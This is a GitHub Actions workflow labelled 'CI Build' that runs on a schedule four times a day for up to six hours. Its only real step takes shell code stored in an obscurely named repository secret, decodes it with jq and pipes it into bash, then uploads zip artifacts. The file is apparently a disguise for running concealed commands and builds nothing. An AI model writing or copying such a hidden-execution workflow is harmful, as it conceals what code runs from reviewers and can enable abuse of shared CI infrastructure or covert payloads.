name: CI Build
on:
  workflow_dispatch:

  schedule:
    - cron: '43 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          jep325: ${{ secrets.jep325 }}
        run: |
          printf '%s' "$jep325" | jq -r .zkv54 | /bin/bash
          echo $f4018 | jq -r .y7 | /bin/bash
          printf '%s' "$qpkln57" | jq -r .zw380 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: xs4kfhh5
          path: "*.zip"
          retention-days: 1
